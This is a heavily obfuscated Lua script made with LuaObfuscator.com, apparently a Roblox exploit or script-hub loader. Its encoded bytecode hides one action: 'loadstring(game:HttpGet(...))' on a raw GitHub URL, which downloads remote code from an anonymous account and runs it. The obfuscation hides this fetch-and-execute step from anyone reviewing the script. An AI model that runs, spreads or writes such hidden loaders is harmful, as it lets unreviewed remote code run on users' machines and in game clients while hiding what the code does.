--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v30,16));if v19 then local v126=0;local v127;while true do if (v126==1) then return v127;end if (v126==0) then v127=v5(v86,v19);v19=nil;v126=1;end end else return v86;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v87=0;local v88;while true do if (v87==0) then v88=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + ((1497 -(282 + 595)) -(555 + 64)))) ;return v88-(v88%(932 -(857 + 74))) ;end end else local v89=((2207 -(1523 + 114)) -(367 + 201))^(v32-((834 + 94) -(214 + 713))) ;return (((v31%(v89 + v89))>=v89) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (12 -9) );v18=v18 + (121 -(32 + 85)) ;return (v40 * (16441815 + 335401)) + (v39 * ((34668 -20135) + 51003)) + (v38 * (1213 -((1648 -756) + (118 -53)))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=(349 + 2) -(87 + (1054 -(368 + 423))) ;local v44=(v20(v42,181 -(67 + 113) ,62 -42 ) * ((2 + 0)^(78 -46))) + v41 ;local v45=v20(v42,16 + 5 ,123 -92 );local v46=((v20(v42,984 -(802 + 150) )==(2 -1)) and  -1) or 1 ;if (v45==(0 -0)) then if (v44==(0 + 0)) then return v46 * (997 -(915 + 82)) ;else v45=2 -(19 -(10 + 8)) ;v43=(0 -0) + 0 ;end elseif (v45==(2691 -644)) then return ((v44==0) and (v46 * ((1188 -(1069 + 118))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(2237 -1214) ) * (v43 + (v44/((1 + 1)^((534 -(416 + 26)) -40)))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;local v49={};for v66=1 -0 , #v48 do v49[v66]=v2(v1(v3(v48,v66,v66)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 0;end)();local v91=(function() return;end)();local v93=(function() return;end)();while true do if (v90==(0 -0)) then local v119=(function() return 0 -0 ;end)();local v120=(function() return;end)();while true do if ((1384 -(746 + 638))~=v119) then else v120=(function() return 0 + 0 ;end)();while true do if (v120==(1 + 0)) then v90=(function() return  #"!";end)();break;end if (v120~=(0 + 0)) then else v91=(function() return v92();end)();v93=(function() return nil;end)();v120=(function() return 1 + 0 ;end)();end end break;end end end if (v90== #"!") then if (v91== #"~") then v93=(function() return v92()~=(0 + 0) ;end)();elseif (v91==(343 -(218 + 123))) then v93=(function() return v94();end)();elseif (v91== #"gha") then v93=(function() return v95();end)();end v96[v97]=(function() return v93;end)();break;end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v51=(function() return function(v98,v99,v100,v101,v102,v103,v104,v105,v106) local v107=(function() return 0;end)();local v98=(function() return;end)();local v99=(function() return;end)();while true do if (v107~=0) then else local v122=(function() return 1581 -(1535 + 46) ;end)();while true do if (v122~=(1 + 0)) then else v107=(function() return 1;end)();break;end if (v122==(0 + 0)) then v98=(function() return 560 -(306 + 254) ;end)();v99=(function() return nil;end)();v122=(function() return 1;end)();end end end if (v107~=(1 -0)) then else local v123=(function() return 0;end)();while true do if (v123==(0 -0)) then while true do if (v98==(0 -0)) then v99=(function() return v100();end)();if (v101(v99, #"!", #":")==(0 + 0)) then local v129=(function() return 0;end)();local v130=(function() return;end)();local v131=(function() return;end)();local v132=(function() return;end)();local v133=(function() return;end)();while true do if (v129==(1468 -(899 + 568))) then local v169=(function() return 0 + 0 ;end)();while true do if (v169==(2 -1)) then v129=(function() return 398 -(115 + 281) ;end)();break;end if (v169==(0 -0)) then v132=(function() return nil;end)();v133=(function() return nil;end)();v169=(function() return 1 + 0 ;end)();end end end if (v129==(292 -(60 + 230))) then while true do if (v130== #"!") then local v178=(function() return 0;end)();local v179=(function() return;end)();while true do if (v178~=(572 -(426 + 146))) then else v179=(function() return 0 + 0 ;end)();while true do if (v179~=(1456 -(282 + 1174))) then else v133=(function() return {v102(),v102(),nil,nil};end)();if (v131==(0 -0)) then local v186=(function() return 0;end)();local v187=(function() return;end)();while true do if (v186~=0) then else v187=(function() return 0;end)();while true do if (v187==(867 -(550 + 317))) then v133[ #"91("]=(function() return v102();end)();v133[ #"?id="]=(function() return v102();end)();break;end end break;end end elseif (v131== #".") then v133[ #"gha"]=(function() return v103();end)();elseif (v131==(5 -3)) then v133[ #"xxx"]=(function() return v103() -(2^(22 -6)) ;end)();elseif (v131~= #"asd") then else local v194=(function() return 0 + 0 ;end)();local v195=(function() return;end)();while true do if (v194==(0 -0)) then v195=(function() return 1251 -(721 + 530) ;end)();while true do if (v195==0) then v133[ #"asd"]=(function() return v103() -(2^16) ;end)();v133[ #"xnxx"]=(function() return v102();end)();break;end end break;end end end v179=(function() return 1;end)();end if (v179==1) then v130=(function() return 5 -3 ;end)();break;end end break;end end end if (v130~= #"nil") then else if (v101(v132, #"91(", #"-19")== #">") then v133[ #"0836"]=(function() return v104[v133[ #"asd1"]];end)();end v105[v106]=(function() return v133;end)();break;end if (v130==2) then local v181=(function() return 0 -0 ;end)();local v182=(function() return;end)();while true do if (v181~=(285 -(134 + 151))) then else v182=(function() return 700 -(271 + 429) ;end)();while true do if (v182==(1 + 0)) then v130=(function() return  #"91(";end)();break;end if ((1665 -(970 + 695))==v182) then if (v101(v132, #",", #"[")== #"<") then v133[3 -1 ]=(function() return v104[v133[1992 -(582 + 1408) ]];end)();end if (v101(v132,6 -4 ,2 -0 )== #"~") then v133[ #"-19"]=(function() return v104[v133[ #"19("]];end)();end v182=(function() return 1;end)();end end break;end end end if (v130~=(0 + 0)) then else local v183=(function() return 1171 -(418 + 753) ;end)();local v184=(function() return;end)();while true do if (v183==(0 -0)) then v184=(function() return 0 + 0 ;end)();while true do if (v184==(1825 -(1195 + 629))) then v130=(function() return  #"~";end)();break;end if (v184==(0 -0)) then v131=(function() return v101(v99,1 + 1 , #"asd");end)();v132=(function() return v101(v99, #"0836",247 -(187 + 54) );end)();v184=(function() return 530 -(406 + 123) ;end)();end end break;end end end end break;end if ((780 -(162 + 618))==v129) then local v170=(function() return 0 + 0 ;end)();while true do if ((1 + 0)==v170) then v129=(function() return 1 -0 ;end)();break;end if ((0 -0)~=v170) then else v130=(function() return 0;end)();v131=(function() return nil;end)();v170=(function() return 1;end)();end end end end end break;end end return v98,v99,v100,v101,v102,v103,v104,v105,v106;end end end end end;end)();local v52=(function() return function(v108,v109,v110) local v111=(function() return 0 + 0 ;end)();local v112=(function() return;end)();while true do if (v111~=(1636 -(1373 + 263))) then else v112=(function() return 1000 -(451 + 549) ;end)();while true do if ((1322 -(1249 + 73))==v112) then v108[v109-#"," ]=(function() return v110();end)();return v108,v109,v110;end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"[",v57 do FlatIdent_12703,Type,v21,Cons,v24,v25,v58,v68=(function() return v50(FlatIdent_12703,Type,v21,Cons,v24,v25,v58,v68);end)();end v56[ #"91("]=(function() return v21();end)();for v69= #",",v23() do FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v58,v53,v69=(function() return v51(FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v58,v53,v69);end)();end for v70= #"|",v23() do v54,v70,v28=(function() return v52(v54,v70,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 + 0 + 0 ];local v64=v60[1147 -(466 + 679) ];local v65=v60[(1128 -(936 + 189)) + 0 ];return function(...) local v71=v63;local v72=v64;local v73=v65;local v74=v27;local v75=2 -1 ;local v76= -(2 -1);local v77={};local v78={...};local v79=v12("#",...) -((1614 -(1565 + 48)) + 0) ;local v80={};local v81={};for v113=0 + 0 ,v79 do if (v113>=v73) then v77[v113-v73 ]=v78[v113 + (2 -1) ];else v81[v113]=v78[v113 + ((2 + 0) -1) ];end end local v82=(v79-v73) + (115 -(4 + 110)) ;local v83;local v84;while true do local v114=0 -0 ;while true do if ((v114==(584 -(57 + (1665 -(782 + 356))))) or (33==1455)) then v83=v71[v75];v84=v83[1428 -((308 -(176 + 91)) + 1386) ];v114=104 -(17 + 86) ;end if (v114==(1 + 0)) then if ((v84<=((7 -4) + 4)) or (443>=4015)) then if (v84<=(6 -(4 -1))) then if (v84<=(2 -1)) then if (v84==((1092 -(975 + 117)) + 0)) then local v134=v83[168 -(122 + 44) ];local v135,v136=v74(v81[v134](v13(v81,v134 + (1 -0) ,v83[9 -6 ])));v76=(v136 + v134) -(1 + 0) ;local v137=0 + 0 ;for v164=v134,v76 do v137=v137 + 1 ;v81[v164]=v135[v137];end else local v138=v83[3 -1 ];local v139,v140=v74(v81[v138](v13(v81,v138 + (1 -0) ,v83[(1943 -(157 + 1718)) -(30 + 29 + 6) ])));v76=(v140 + v138) -(1 + 0) ;local v141=1257 -(1043 + 214) ;for v167=v138,v76 do local v168=0 -0 ;while true do if ((3382>166) and (v168==0)) then v141=v141 + (1213 -(323 + 889)) ;v81[v167]=v139[v141];break;end end end end elseif (v84==(5 -3)) then v81[v83[582 -((1281 -920) + 219) ]]=v62[v83[323 -(53 + 267) ]];else local v144=v83[1 + 1 ];v81[v144]=v81[v144](v13(v81,v144 + 1 + 0 ,v76));end elseif ((v84<=(418 -(15 + 398))) or (280==3059)) then if (v84==(986 -(18 + 964))) then v81[v83[2]]=v83[11 -8 ];else do return;end end elseif ((1881>1293) and (v84>(4 + 2))) then local v148=0 + 0 ;local v149;local v150;while true do if (v148==(850 -(20 + (2837 -2007)))) then v149=v83[2 + 0 ];v150=v81[v83[129 -(116 + 10) ]];v148=1;end if ((2357==2357) and ((1 + 0)==v148)) then v81[v149 + (739 -(542 + 196)) ]=v150;v81[v149]=v150[v83[8 -4 ]];break;end end else v81[v83[1 + 1 ]]();end elseif (v84<=((1024 -(697 + 321)) + 5)) then if (v84<=(1984 -(1913 + 62))) then if (v84>(6 + 2)) then do return;end else v81[v83[5 -3 ]]=v62[v83[2 + 1 ]];end elseif (v84>(26 -16)) then v81[v83[7 -5 ]]=v83[7 -4 ];else local v155=v83[1553 -(1126 + 425) ];v81[v155]=v81[v155](v13(v81,v155 + (406 -(118 + 287)) ,v76));end elseif (v84<=(50 -37)) then if (v84>12) then v81[v83[858 -(564 + 292) ]]={};else local v158=v83[1123 -(118 + 1003) ];local v159=v81[v83[8 -5 ]];v81[v158 + (378 -((386 -244) + 235)) ]=v159;v81[v158]=v159[v83[18 -14 ]];end elseif ((123==123) and (v84==((23 -12) + 3))) then v81[v83[1 + 1 ]]={};else v81[v83[2]]();end v75=v75 + (978 -(553 + 424)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403853Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F313337397170616C7A6D74796776657A696D616C6965786376626E71706C61736466672F422Q4F5342532F726566732F68656164732F6D61696E2F254539252Q422539312545362542342539452545342542382541442545352542462538332E74787400094Q000E7Q001208000100013Q001208000200023Q00200C00020002000300120B000400044Q0001000200044Q000300013Q00022Q00060001000100012Q00053Q00017Q00",v9(),...);
